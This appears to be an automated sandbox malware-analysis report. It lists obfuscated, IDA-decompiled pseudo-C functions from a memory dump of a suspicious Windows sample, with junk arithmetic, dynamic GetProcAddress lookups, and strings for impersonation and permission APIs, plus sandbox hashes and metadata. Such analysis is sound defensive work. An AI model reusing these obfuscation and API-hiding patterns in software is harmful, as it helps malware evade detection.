                                                          				_push( *((intOrPtr*)(_t232 - 0x44)));
                                                          				_t210 = _t209 >> _t180;
                                                          				 *((intOrPtr*)(_t232 - 0xc)) =  *((intOrPtr*)(_t232 - 8));
                                                          				if(0x19d5c8 <= 0x2d) {
                                                          					L10:
                                                          					_t182 = 0xffffffffffa59605;
                                                          					 *0x50afde =  *0x50afde;
                                                          					 *0x508184 = 0xffffffffffa59605;
                                                          					if(0xffffffffffa59605 >= 0xffffffffffa59605) {
                                                          						goto L11;
                                                          					}
                                                          				} else {
                                                          					 *((intOrPtr*)(_t232 - 0x18)) =  *((intOrPtr*)(_t232 - 0x18)) + _t180;
                                                          					 *0x50812e = _t180;
                                                          					_t182 = 0x7b6b;
                                                          					 *0x5081ce = _t201;
                                                          					if((_t201 & 0x00009af5) == 0) {
                                                          						L8:
                                                          						if(0xe < 0x16) {
                                                          							goto L12;
                                                          						} else {
                                                          							goto L10;
                                                          						}
                                                          					} else {
                                                          						_t201 = _t201 | 0x0000aab9;
                                                          						if(_t210 != 0) {
                                                          							L11:
                                                          							_t201 =  *0x5081d2; // 0x8a5b
                                                          							L12:
                                                          							 *0x508220 = _t201;
                                                          						} else {
                                                          							_t210 = 0;
                                                          							goto L8;
                                                          						}
                                                          					}
                                                          				}
                                                          				_t76 =  *((intOrPtr*)(_t232 - 0xc));
                                                          				_push( *((intOrPtr*)(_t232 - 0x40)));
                                                          				 *0x50afe6 = _t76;
                                                          				_t131 = 0xe80e1;
                                                          				 *((intOrPtr*)(_t232 - 8)) = _t76;
                                                          				if(_t76 <= 0x23b7a8) {
                                                          					L18:
                                                          					goto L19;
                                                          				} else {
                                                          					_t131 =  *((intOrPtr*)(_t232 - 0xc)) + 0x3f7a;
                                                          					 *0x50afdc =  *0x50afdc - _t131;
                                                          					if(_t131 > _t182) {
                                                          						L19:
                                                          						if(_t131 != 0x31) {
                                                          							 *0x50815a = 0x600f;
                                                          							_t182 = 0x82;
                                                          						}
                                                          					} else {
                                                          						_t182 = _t182 + 0x68;
                                                          						 *((intOrPtr*)(_t232 - 0x1c)) =  *((intOrPtr*)(_t232 - 0x1c)) - _t182;
                                                          						 *0x5081a4 = _t201;
                                                          						_t201 = _t201 - 0x86b747;
                                                          						 *0x50820a =  *0x50820a - _t201;
                                                          						 *0x509beb =  *0x509beb + _t201;
                                                          						if(_t226 < 0) {
                                                          							goto L19;
                                                          						} else {
                                                          							if(_t226 < 0) {
                                                          								 *0x5086a7 =  *0x5086a7 + _t210;
                                                          								goto L18;
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				 *0x5081dc =  *0x5081dc - _t201;
                                                          				 *((intOrPtr*)(_t232 - 8)) = GetProcAddress(??, ??);
                                                          				_t88 =  *((intOrPtr*)(_t232 - 8));
                                                          				if(0x2d9987 >= 0x2d9987) {
                                                          					L24:
                                                          					_t210 = 0x50ac14;
                                                          					 *0x50af94 =  *0x50af94 - 0x50ac14;
                                                          				} else {
                                                          					 *0x50afdd =  *0x50afdd + _t182;
                                                          					if(_t182 >= _t182) {
                                                          						_t182 = _t182 + _t182;
                                                          						_t201 =  *0x5081ae; // 0x630
                                                          						 *0x5081fc = _t201;
                                                          						 *0x508212 = _t201;
                                                          						 *0x50827a =  *0x50827a;
                                                          						 *0x50afe3 = _t88;
                                                          						_t226 = 0;
                                                          						goto L24;
                                                          					}
                                                          				}
                                                          				 *0x50808e =  *0x50808e - _t88;
                                                          				 *((intOrPtr*)(_t232 - 0x48)) = _t88;
                                                          				_t227 = _t226 + 0xb5d430;
                                                          				 *0x50afe5 = _t88;
                                                          				 *((intOrPtr*)(_t232 - 8)) = _t88;
                                                          				_t90 =  *((intOrPtr*)(_t232 - 8));
                                                          				_t139 = _t88 - _t88;
                                                          				 *((intOrPtr*)(_t232 - 8)) = _t90;
                                                          				if(_t90 < 0x1c223d) {
                                                          					if(_t90 >= 0x2a46c2) {
                                                          						 *0x50afdc =  *0x50afdc +  !(_t139 - 0x40);
                                                          						_t182 = _t182 + _t182 + 0x66cc;
                                                          					}
                                                          					 *0x5081a2 = _t201;
                                                          					_t201 = 0x9d85;
                                                          					 *0x50823e = _t227;
                                                          					_t90 = 0;
                                                          				}
                                                          				_t228 = _t227 + 0xb0a1ac;
                                                          				 *0x50afe5 = _t90;
                                                          				_t94 =  *((intOrPtr*)(_t232 - 8));
                                                          				if( *((intOrPtr*)(_t232 - 0x48)) == 0) {
                                                          					 *((intOrPtr*)(_t232 - 8)) = _t94;
                                                          					E00464241(_t201, 1, 0, _t94);
                                                          					 *0x50808a =  *0x50808a;
                                                          					_push(1);
                                                          					_push(E004FF83D);
                                                          					_push(E004BF25C);
                                                          					return 0x1edb6a;
                                                          				} else {
                                                          					 *((intOrPtr*)(_t232 - 8)) = _t94;
                                                          					 *((intOrPtr*)(_t232 - 0xc)) = 0x2d165f;
                                                          					_t145 =  *((intOrPtr*)(_t232 - 0x10)) - 0x4c;
                                                          					_t102 =  *((intOrPtr*)(_t232 - 8));
                                                          					 *((intOrPtr*)(_t232 - 0x18)) = _t145;
                                                          					if(_t182 == _t182) {
                                                          						L33:
                                                          						 *((intOrPtr*)(_t232 - 8)) = _t102;
                                                          						 *((intOrPtr*)(_t232 - 8)) = _t102;
                                                          						 *(_t232 - 0x14) = _t145 - 0xffffffffffe3b6f7 + 0x3c3e;
                                                          					} else {
                                                          						 *0x5081cc = _t201;
                                                          						_t201 = 0xa1b2;
                                                          						 *0x508264 =  *0x508264 - 0xb177;
                                                          						_t228 = 0x162ee;
                                                          						if(0 <= 0) {
                                                          							 *0x50afe6 = 0;
                                                          							goto L33;
                                                          						}
                                                          					}
                                                          					_t186 = _t201;
                                                          					_t202 =  *0x5081ce; // 0xb268
                                                          					_push( *((intOrPtr*)(_t232 + 0xc)));
                                                          					 *0x50afe6 = _t102;
                                                          					 *((intOrPtr*)(_t232 - 8)) = _t102;
                                                          					if(_t102 <= 0x1ecc) {
                                                          						L41:
                                                          						 *0x508156 = _t186;
                                                          						_t187 = _t232 - 0x20;
                                                          					} else {
                                                          						 *(_t232 - 0x14) =  *(_t232 - 0x14) - "api-ms-win-core-rtlsupport-l1-1-0.dll";
                                                          						_t191 =  *0x508136; // 0x4aea
                                                          						_t187 = _t191 - 0x67;
                                                          						if(_t187 == _t187) {
                                                          							 *((intOrPtr*)(_t232 - 0x20)) =  *((intOrPtr*)(_t232 - 0x20)) + _t187;
                                                          						}
                                                          						if((_t202 + _t202 & 0x00000097) <= 0) {
                                                          						}
                                                          						_t228 =  !_t228;
                                                          						if(0 >= 8) {
                                                          							goto L41;
                                                          						}
                                                          					}
                                                          					 *0x5081f0 = 0x8657;
                                                          					_push( *((intOrPtr*)(_t232 + 8)));
                                                          					_t106 =  *((intOrPtr*)(_t232 - 8));
                                                          					 *((intOrPtr*)(_t232 - 8)) = _t106;
                                                          					if(_t106 != 0x1c) {
                                                          						 *(_t232 - 0x14) = "EnumWindowStationsA";
                                                          						_t187 = _t187 + 0x64;
                                                          						 *0x50817a = _t187;
                                                          						if(_t187 == _t187) {
                                                          							if(0x8204 <= 0) {
                                                          							}
                                                          							 *0x50afe5 = _t106;
                                                          							goto L47;
                                                          						}
                                                          					}
                                                          					 *0x508148 = _t187 + 0x52be20;
                                                          					_push(E004FF7E4);
                                                          					_push( *((intOrPtr*)(_t232 - 0x48)));
                                                          					return  *((intOrPtr*)(_t232 - 8));
                                                          				}
                                                          			}






























                                                          APIs
                                                          • GetProcAddress.KERNEL32(?,?), ref: 004FF4F6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: 8%6$BuildExplicitAccessWithNameA$CNHMWL.dll$EnumWindowStationsA$GetTickCount64$P>!$RemoveVectoredExceptionHandler$RtlImpersonateSelfEx$api-ms-win-core-rtlsupport-l1-1-0.dll$xmllite.dll
                                                          • API String ID: 190572456-3400267085
                                                          • Opcode ID: bf2af1bd2475bb9d17053a8332c30bc765ff26c4f9119d4b3fd80cf46294ca2c
                                                          • Instruction ID: 0fdbdfdcd49a9609097717f2a1ee45d115053353ab9eb8032cab0f664801f284
                                                          • Opcode Fuzzy Hash: bf2af1bd2475bb9d17053a8332c30bc765ff26c4f9119d4b3fd80cf46294ca2c
                                                          • Instruction Fuzzy Hash: F3C1D179A0074A8FCB00DF78D894AEE7BB1EF38310F04407AD984E7362E679094ADB55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 34%
                                                          			E004AB74C() {
                                                          				void* _t67;
                                                          				void* _t71;
                                                          				void* _t77;
                                                          				void* _t79;
                                                          				void* _t80;
                                                          				void* _t85;
                                                          				void* _t89;
                                                          				void* _t92;
                                                          				DWORD* _t102;
                                                          				intOrPtr _t104;
                                                          				signed int _t125;
                                                          				void* _t147;
                                                          				short _t172;
                                                          				void* _t174;
                                                          				unsigned short _t176;
                                                          				short _t180;
                                                          				unsigned short _t189;
                                                          				void* _t199;
                                                          				signed int _t201;
                                                          				signed int _t204;
                                                          				intOrPtr _t205;
                                                          				void* _t215;
                                                          				void* _t216;
                                                          				void _t218;
                                                          				signed int _t220;
                                                          				short _t221;
                                                          				void* _t224;
                                                          				intOrPtr _t234;
                                                          
                                                          				 *0x50afe1 =  *0x50afe1 + 0xa3d7;
                                                          				_t67 =  *(_t224 - 8);
                                                          				if(_t67 != 0xf) {
                                                          					L3:
                                                          					_t172 = _t172 + _t172;
                                                          					L4:
                                                          					 *0x5081ec = 0xa3d7;
                                                          					 *0x508208 = 0xa3d7;
                                                          					 *(_t224 - 0x58) = _t67;
                                                          					 *0x50afe5 = _t67;
                                                          					 *(_t224 - 8) = _t67;
                                                          					_push(_t67);
                                                          					L004A9E48();
                                                          					_t174 = _t224 - 0x18;
                                                          					_t71 =  *(_t224 - 8);
                                                          					if(1 < 0x3a) {
                                                          						L7:
                                                          						 *0x508260 =  *0x508260 + _t220;
                                                          						L8:
                                                          						 *0x5086df =  *0x5086df - _t215;
                                                          						_t216 = _t215 + _t215;
                                                          						if(_t71 <= 0x11461b) {
                                                          							_t15 = _t224 - 0x14;
                                                          							 *_t15 =  *((intOrPtr*)(_t224 - 0x14)) + 0x34a166;
                                                          							_t234 =  *_t15;
                                                          						}
                                                          						_t176 =  *0x508198; // 0xf368
                                                          						 *(_t224 - 8) =  *_t71;
                                                          						 *((intOrPtr*)(_t224 - 0x14)) = "GetAccessPermissionsForObjectW";
                                                          						E004A9734(0, "GetAccessPermissionsForObjectW", _t176, _t216, _t220, _t234);
                                                          						_t77 =  *(_t224 - 8);
                                                          						 *(_t224 - 0x5c) = _t77;
                                                          						 *(_t224 - 0x5c) =  *(_t224 - 0x5c) - 1;
                                                          						_t199 = 0x8ec0;
                                                          						 *(_t224 - 8) = _t77;
                                                          						_t79 =  *(_t224 - 8);
                                                          						_t125 =  !("RtlImpersonateSelfEx");
                                                          						 *(_t224 - 8) = _t79;
                                                          						if(_t79 <= 0x1b) {
                                                          							L14:
                                                          							 *0x508194 = _t176;
                                                          							_t199 = 0;
                                                          							goto L15;
                                                          						} else {
                                                          							if(_t125 <= 0x323a || _t125 != _t125) {
                                                          								 *((intOrPtr*)(_t224 - 0x14)) =  *((intOrPtr*)(_t224 - 0x14)) + _t125;
                                                          								_t125 =  *(_t224 - 0x18);
                                                          								_t176 = 0xffffffffff9ac37b;
                                                          								goto L14;
                                                          							} else {
                                                          								L15:
                                                          								 *0x50afe0 =  *0x50afe0 - _t199 + 0x93;
                                                          								_t80 =  *(_t224 - 8);
                                                          								_push( *(_t224 - 0x5c));
                                                          								if(_t80 == 5) {
                                                          									 *0x5080f8 =  *0x5080f8 + 0x35fdfc;
                                                          									_t125 = 0x35fdfc + _t176;
                                                          									_t189 = _t176 + _t176 + 0x606b89;
                                                          									 *0x50afde =  *0x50afde + _t189;
                                                          									_t176 = _t189 >> _t189;
                                                          								}
                                                          								_t201 =  *0x5081e6; // 0x8ae1
                                                          								 *0x508234 = _t220;
                                                          								_t221 = 0;
                                                          								 *(_t224 - 8) = _t80;
                                                          								if(0x28c957 != 0x3667) {
                                                          									_t176 =  *0x50816c; // 0x28a9
                                                          									 *0x5081ba = _t201;
                                                          								}
                                                          								_t204 = _t201 + _t201 + 0x8cb8d5 - 0xa7;
                                                          								_t132 = 0x50807f;
                                                          								 *((intOrPtr*)(_t224 - 0x14)) = 0x508080;
                                                          								 *((intOrPtr*)(_t224 - 0x14)) = 0x508080;
                                                          								_t85 =  *(_t224 - 0x4c);
                                                          								 *(_t224 - 8) = _t85;
                                                          								if(_t85 >= 0x17520d) {
                                                          									L22:
                                                          									 *0x50afe3 =  *0x50afe3 + _t85;
                                                          									goto L23;
                                                          								} else {
                                                          									_t132 = 0x5046f5;
                                                          									if(0x5046f5 < 0x5046f5) {
                                                          										L23:
                                                          										 *0x50afd8 = 0xfb;
                                                          										 *0x50850b = 0xfb;
                                                          										_t218 =  *( *(_t224 - 8));
                                                          										_t89 = _t218;
                                                          										if(_t132 == _t176) {
                                                          											_t176 = 0x6aef;
                                                          											 *0x508198 = 0x6aef;
                                                          											_t204 = 0;
                                                          											if(0 <= 0) {
                                                          												 *0x508232 = _t221;
                                                          											}
                                                          										}
                                                          										 *(_t224 - 8) = _t89;
                                                          										 *(_t224 - 0x10) = "xmllite.dll";
                                                          										_t92 =  *(_t224 - 8);
                                                          										 *(_t224 - 0x60) = _t92;
                                                          										 *0x5081ba = _t204;
                                                          										_t205 =  *0x5081ea; // 0x8772
                                                          										 *(_t224 - 8) = _t92;
                                                          										 *(_t224 - 0x10) = 0x31382f;
                                                          										 *(_t224 - 0x10) = 0x31382f;
                                                          										_t180 =  *0x508144; // 0x779d
                                                          										 *0x508196 = _t180;
                                                          										 *0x5081ae = _t205 - 0x9c55 + 0xac19;
                                                          										_t102 = GetSidSubAuthority( *(_t224 - 0x60), ??);
                                                          										 *0x50afe0 =  *0x50afe0 + 0xffffffffffff6655;
                                                          										if(5 < 0) {
                                                          											L28:
                                                          											if(_t102 <= 0x1e) {
                                                          												goto L31;
                                                          											}
                                                          											 *0x508078 =  *0x508078 - _t102;
                                                          											goto L30;
                                                          										} else {
                                                          											 *0x5086e7 =  *0x5086e7 + _t218;
                                                          											 *0x50aea0 =  *0x50aea0 + _t218;
                                                          											if(_t102 <= 0xc69dd) {
                                                          												L30:
                                                          												_t180 = 0x614479;
                                                          												 *0x50afdf =  *0x50afdf - 0x614479;
                                                          												L31:
                                                          												_t147 =  *_t102;
                                                          												 *(_t224 - 8) = _t147;
                                                          												_t104 =  *0x50874f; // 0x0
                                                          												 *0x508080 =  *0x508080 - _t104;
                                                          												 *0x508098 =  *0x508098 + _t147;
                                                          												_push(E004ABB74);
                                                          												goto __ebx;
                                                          											}
                                                          											goto L28;
                                                          										}
                                                          									}
                                                          									 *0x5080f0 =  *0x5080f0 + 0x5046f5;
                                                          									_t132 =  *(_t224 - 0x18);
                                                          									_t176 = _t176 - 1 + 1;
                                                          									 *0x508192 = _t176;
                                                          									_t204 =  !0x9827;
                                                          									_t221 = _t221 + _t221;
                                                          									_t85 = 0xc3;
                                                          									goto L22;
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          					 *(_t224 - 0x18) =  *(_t224 - 0x18) + _t174;
                                                          					 *0x5081c6 = 0xa3d7;
                                                          					if(0xa002 == 0) {
                                                          						goto L8;
                                                          					}
                                                          					_t220 = _t220 | 0x009dc368;
                                                          					goto L7;
                                                          				}
                                                          				if("AddInUtil.exe" != 0x37f42b) {
                                                          					goto L4;
                                                          				} else {
                                                          					 *0x508152 = _t172;
                                                          					goto L3;
                                                          				}
                                                          			}
































                                                          APIs
                                                          • GetSidSubAuthority.ADVAPI32(?,00000001), ref: 004ABAD6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: Authority
                                                          • String ID: /81$AddInUtil.exe$CreateMutexW$GetAccessPermissionsForObjectW$Microsoft.Office.Tools.Outlook.v9.0.ni.dll$PenIMC_v0400.dll$RtlImpersonateSelfEx$WSearchMigPlugin.dll$psxdllsvr.dll$xmllite.dll
                                                          • API String ID: 3356026975-2906516509
                                                          • Opcode ID: 40e8398ffec3e97645434c8679bcbfd4d1180f68edb19f7a18c5de779d64e0ef
                                                          • Instruction ID: b4e8aa48202a3867b9726eaf1f9c5ce7a5dcb2ac5afe1edf9962b1ba8b7a9492
                                                          • Opcode Fuzzy Hash: 40e8398ffec3e97645434c8679bcbfd4d1180f68edb19f7a18c5de779d64e0ef
                                                          • Instruction Fuzzy Hash: 52B1ACB9A507468FCB00DFB8D8949ED7BB1FF3A320B04416AC984E7366E7390949D745
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 26%
                                                          			E0049BBE0() {
                                                          				_Unknown_base(*)()* _t54;
                                                          				_Unknown_base(*)()* _t56;
                                                          				_Unknown_base(*)()* _t58;
                                                          				_Unknown_base(*)()* _t64;
                                                          				_Unknown_base(*)()* _t72;
                                                          				_Unknown_base(*)()* _t86;
                                                          				char _t88;
                                                          				signed int _t94;
                                                          				signed int _t101;
                                                          				signed int _t102;
                                                          				signed int _t106;
                                                          				signed char _t133;
                                                          				short _t141;
                                                          				void* _t143;
                                                          				short _t144;
                                                          				intOrPtr _t147;
                                                          				void* _t148;
                                                          				unsigned short _t155;
                                                          				short _t158;
                                                          				void* _t161;
                                                          				intOrPtr _t165;
                                                          				void* _t166;
                                                          				void* _t171;
                                                          				void* _t172;
                                                          				void* _t173;
                                                          				short _t174;
                                                          				short _t176;
                                                          				void* _t180;
                                                          
                                                          				_t54 =  *(_t180 - 8);
                                                          				_t94 = "WcnEapAuthProxy.dll";
                                                          				if(_t133 == _t133) {
                                                          					_t133 = 0x6cf4;
                                                          					 *((intOrPtr*)(_t180 - 0x14)) =  *((intOrPtr*)(_t180 - 0x14)) - 0x6cf4;
                                                          				}
                                                          				 *0x508220 =  *0x508220 - 0x9c42;
                                                          				_t155 = 0x9c42 - _t173;
                                                          				_t174 = _t173 + 0xaf80ab;
                                                          				 *(_t180 - 8) = _t54;
                                                          				_t56 =  *(_t180 - 8);
                                                          				if(_t94 + _t54 >> _t133 >= _t94 + _t54 >> _t133) {
                                                          					 *0x508152 = _t133;
                                                          					_t133 =  *0x5081a2; // 0xea53
                                                          					_t155 = _t155 - 0x77de78;
                                                          				}
                                                          				 *(_t180 - 8) = _t56;
                                                          				if(_t56 >= 0x28) {
                                                          					_t133 = _t133 - 0x639790;
                                                          				}
                                                          				_t158 = (_t155 >> _t133) + (_t155 >> _t133) + 0x86f2dc;
                                                          				 *0x508240 = _t174;
                                                          				_t58 = GetProcAddress(??, ??);
                                                          				 *0x50afe3 = _t58;
                                                          				_t172 = _t171 + 0xde78;
                                                          				 *0x50afe6 = _t58;
                                                          				 *(_t180 - 8) = _t58;
                                                          				 *((intOrPtr*)(_t180 - 0x10)) = 0x4b;
                                                          				_t101 = "EnumWindowStationsA";
                                                          				 *(_t180 - 0xc) = _t101;
                                                          				_t102 = _t101;
                                                          				_t64 =  *(_t180 - 8);
                                                          				if(_t102 >= 0x35) {
                                                          					if(_t102 < _t102) {
                                                          					}
                                                          					_t102 = "lprmonui.dll";
                                                          				}
                                                          				 *0x5081ce = _t158;
                                                          				 *0x5091ab = _t64;
                                                          				 *(_t180 - 8) = _t64;
                                                          				if(_t64 > 0x237014) {
                                                          					_t102 =  *(_t180 - 0xc);
                                                          					if(_t102 <= _t102) {
                                                          						 *0x508104 =  *0x508104 - _t102;
                                                          					}
                                                          					 *0x50962f =  *0x50962f - _t158;
                                                          				}
                                                          				 *0x50823e =  *0x50823e - 0x9dc7;
                                                          				_t176 = 0;
                                                          				_push(0);
                                                          				_t140 = 0x8054;
                                                          				 *0x5081c4 = 0x9dc7;
                                                          				_t161 = 0;
                                                          				_t106 = "SystemPropertiesComputerName.exe";
                                                          				if(_t106 < _t106) {
                                                          					L18:
                                                          					 *0x50808e =  *0x50808e - _t106;
                                                          					_push( *0x508218);
                                                          					_t141 = _t140 - 0x6bcf;
                                                          					 *(_t180 - 0xc) =  !("lprmonui.dll");
                                                          					_t72 =  *(_t180 - 8);
                                                          					 *0x508150 = _t141;
                                                          					_t143 = _t141 + _t141 + _t141 + _t141;
                                                          					 *(_t180 - 8) = _t72;
                                                          					if(_t72 < 0x22ecec) {
                                                          						 *0x5080e8 =  *0x5080e8 + 0x3823b3;
                                                          					}
                                                          					L004668D8(_t143, _t161, _t172, _t176, _t143, _t143, 1);
                                                          					_push( *0x5080d8);
                                                          					_t144 = _t143 + 1;
                                                          					 *0x508170 = _t144;
                                                          					 *0x508afb =  *((intOrPtr*)(_t180 - 0x10));
                                                          					_push( *0x5080ce);
                                                          					 *0x508198 = _t144 + 1;
                                                          					_t165 =  *0x5081e6; // 0x8ae1
                                                          					_t166 = _t165 - 0x91ae29;
                                                          					 *0x508234 = _t176;
                                                          					_push( *0x5080c8);
                                                          					 *(_t180 - 0xc) =  *(_t180 - 0xc) + 0x4be772;
                                                          					 *(_t180 - 0xc) = 0x4be772;
                                                          					_t147 =  *0x50811c; // 0x6f15
                                                          					 *((intOrPtr*)(_t180 - 0x14)) =  *((intOrPtr*)(_t180 - 0x14)) + _t147;
                                                          					 *((intOrPtr*)(_t180 - 0x10)) = 0;
                                                          					_t86 =  *(_t180 - 8);
                                                          					_push( *0x50806e);
                                                          					if(0x51 < 0x51) {
                                                          						L23:
                                                          						 *0x50820e = _t166 - 0x92;
                                                          						goto L24;
                                                          					} else {
                                                          						_t148 = _t147 - 0x60b2;
                                                          						if(_t148 < _t148) {
                                                          							L24:
                                                          							_push( *0x508154);
                                                          							 *0x50afe3 = _t86;
                                                          							 *(_t180 - 8) = _t86;
                                                          							_push(_t86);
                                                          							_push(_t86);
                                                          							_push(0);
                                                          							_push(0x49bf7c);
                                                          							goto __eax;
                                                          						}
                                                          						E00508174 = E00508174 + _t148;
                                                          						goto L23;
                                                          					}
                                                          				} else {
                                                          					if(_t106 >= _t106) {
                                                          						L17:
                                                          						_t88 =  *0x50afe6; // -97
                                                          						 *0x50afd8 = _t88;
                                                          						goto L18;
                                                          					}
                                                          					_t106 =  *((intOrPtr*)(_t180 - 0x10));
                                                          					 *0x50afde =  *0x50afde + 0xffffffffffa8c0d3;
                                                          					_t140 = 0xbadbad;
                                                          					_t161 = 0x9125;
                                                          					 *0x509a07 =  *0x509a07;
                                                          					_t176 = 0xffffffffffff476f;
                                                          					 *0x50afe3 = 0;
                                                          					if(0 < 0) {
                                                          						goto L18;
                                                          					}
                                                          					goto L17;
                                                          				}
                                                          			}
































                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: B5d$EnumWindowStationsA$SystemPropertiesComputerName.exe$WcnEapAuthProxy.dll$api-ms-win-core-sysinfo-l1-1-0.dll$lprmonui.dll$lyncicon.exe$wlanmsm.dll$Nqt$y!
                                                          • API String ID: 190572456-3128969411
                                                          • Opcode ID: 6dbeb64a5bff84542eee9219351072fca529d01774d8c5fb56b1e9822191abe1
                                                          • Instruction ID: 0ce305c26db08a34d1cbf7c1f458fb2de2b613075d1e872094a0301f41b2ef6b
                                                          • Opcode Fuzzy Hash: 6dbeb64a5bff84542eee9219351072fca529d01774d8c5fb56b1e9822191abe1
                                                          • Instruction Fuzzy Hash: D0919F75A5070A9BCB00DFA8ED949ED7BB1FB38310B44807ED985E7321E7390989D745
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 55%
                                                          			E0047B8E1() {
                                                          				_Unknown_base(*)()* _t44;
                                                          				_Unknown_base(*)()* _t49;
                                                          				_Unknown_base(*)()* _t53;
                                                          				_Unknown_base(*)()* _t58;
                                                          				_Unknown_base(*)()* _t60;
                                                          				_Unknown_base(*)()* _t61;
                                                          				char* _t64;
                                                          				_Unknown_base(*)()* _t66;
                                                          				_Unknown_base(*)()* _t67;
                                                          				_Unknown_base(*)()* _t68;
                                                          				_Unknown_base(*)()* _t72;
                                                          				void* _t73;
                                                          				char* _t101;
                                                          				intOrPtr _t106;
                                                          				intOrPtr _t108;
                                                          				void* _t134;
                                                          				short _t140;
                                                          				signed int _t142;
                                                          				short _t145;
                                                          				signed int _t153;
                                                          				signed int _t156;
                                                          				short _t157;
                                                          				void* _t159;
                                                          
                                                          				 *(_t159 - 8) = _t44;
                                                          				L00464E9E(_t73, _t142, _t156, _t73);
                                                          				L00464E9E(0, _t142, _t156, 0);
                                                          				 *(_t159 - 0x10) =  *(_t159 - 0x10) - _t134 + _t134 - 0x67;
                                                          				 *0x50afda =  *0x50afda;
                                                          				 *0x5080c0 =  *0x5080c0 + 0x4d7f10;
                                                          				_t49 =  *(_t159 - 8);
                                                          				 *(_t159 - 0x2c) = _t49;
                                                          				 *(_t159 - 8) = _t49;
                                                          				 *((intOrPtr*)(_t159 - 0xc)) = 0x4d3fd6;
                                                          				_t137 = 0x55ede8;
                                                          				 *0x508158 = 0x55ede8;
                                                          				_push( *(_t159 - 0x2c));
                                                          				_t53 =  *(_t159 - 8);
                                                          				if(0x2d6019 < 0x2d6019) {
                                                          					L5:
                                                          					 *0x50812c = _t137;
                                                          					 *(_t159 - 8) = _t53;
                                                          					 *0x508150 = _t137;
                                                          					L004668D8(0, _t142, _t153, _t156,  *(_t159 - 8), 0,  *(_t159 - 8));
                                                          					 *(_t159 - 0x10) = 0x3f441a;
                                                          					 *0x508188 =  *0x508188 - 0x6614;
                                                          					 *0x5081a2 = _t142;
                                                          					_t58 = GetProcAddress( *0x5083db, ??);
                                                          					 *0x5081f2 = _t142 ^ 0x00000088;
                                                          					_t145 = 0xb1;
                                                          					_t90 = 0xc1;
                                                          					 *0x50afe3 =  *0x50afe3 - _t58;
                                                          					if(_t156 == 0) {
                                                          						_t153 = _t153 - 0xd4b368;
                                                          						 *0x50af28 =  *0x50af28 - _t153;
                                                          						_t90 = "wlanmsm.dll" - _t58;
                                                          					}
                                                          					 *0x50afdc =  *0x50afdc - _t90 + 0x32ff54;
                                                          					 *(_t159 - 0x10) = 0x6614;
                                                          					_t140 = 0x700d;
                                                          					 *(_t159 - 8) = _t58;
                                                          					_t60 =  *(_t159 - 8);
                                                          					 *((intOrPtr*)(_t159 - 0xc)) = 0x2cdcf1;
                                                          					 *0x5088a7 = _t60;
                                                          					_t157 = _t156 + 0xd0c1;
                                                          					if(_t153 < 0) {
                                                          						if(_t153 < 0) {
                                                          							 *((intOrPtr*)(_t159 - 0xc)) =  *(_t159 - 8) - 0x3bfe;
                                                          							_t140 = 0x636b;
                                                          							 *0x50817e = 0x636b;
                                                          							_t145 = _t157;
                                                          						}
                                                          						_t157 = _t157 + 0xae0557;
                                                          						 *0x50afe5 = _t60;
                                                          						_t153 = _t153 ^ 0x000000dd;
                                                          					}
                                                          					 *0x508437 = _t60;
                                                          					_push(0);
                                                          					 *0x50afd9 =  *0x50afd9 - _t60;
                                                          					 *(_t159 - 8) = _t60;
                                                          					_t61 =  *(_t159 - 8);
                                                          					_push( *0x50812a);
                                                          					_t101 =  *0x50afe5; // -1
                                                          					 *(_t159 - 8) = _t61;
                                                          					if(_t61 <= 0x3067) {
                                                          						L16:
                                                          						goto L17;
                                                          					} else {
                                                          						_t101 = "api-ms-win-core-rtlsupport-l1-1-0.dll";
                                                          						 *(_t159 - 0x10) = _t101;
                                                          						if(_t140 > _t140) {
                                                          							L17:
                                                          							_t64 = "lyncicon.exe";
                                                          							if(_t101 >= 0x33) {
                                                          								_t101 = 0x42806f;
                                                          								 *(_t159 - 0x10) = 0x42806f;
                                                          								_t140 = _t140 - 0x7b;
                                                          							}
                                                          							 *0x5081c8 = _t145;
                                                          							 *0x50afe1 = _t64;
                                                          							_t66 =  *(_t159 - 8);
                                                          							_push( *0x508044);
                                                          							 *0x50afdd =  *0x50afdd - _t140;
                                                          							 *(_t159 - 8) = _t66;
                                                          							_push(_t66);
                                                          							E00465A23();
                                                          							 *0x50afdc =  *0x50afdc + 0x3e3dca;
                                                          							_t67 =  *(_t159 - 8);
                                                          							 *(_t159 - 8) = _t67;
                                                          							if(_t67 == 0x28) {
                                                          							}
                                                          							_t68 =  *(_t159 - 8);
                                                          							 *0x5081c0 = 0xa8c3;
                                                          							_push( *0x508088);
                                                          							 *0x50afd8 = _t68;
                                                          							_t106 =  *0x50860b; // 0x0
                                                          							 *(_t159 - 8) = _t68;
                                                          							 *0x5089f7 = _t106;
                                                          							_t108 =  *((intOrPtr*)(_t159 - 0xc));
                                                          							_push(1);
                                                          							_push(_t108);
                                                          							_push(_t108);
                                                          							_push(0x47bc53);
                                                          							goto __ebx;
                                                          						}
                                                          						if(_t140 != _t140) {
                                                          							 *((intOrPtr*)(_t159 - 0x14)) =  *((intOrPtr*)(_t159 - 0x14)) + _t140;
                                                          							 *0x5081a6 = _t145;
                                                          						}
                                                          						_t145 = _t157;
                                                          						_t72 =  *0x50afe5; // -1
                                                          						 *0x50afe6 = _t72;
                                                          						goto L16;
                                                          					}
                                                          				}
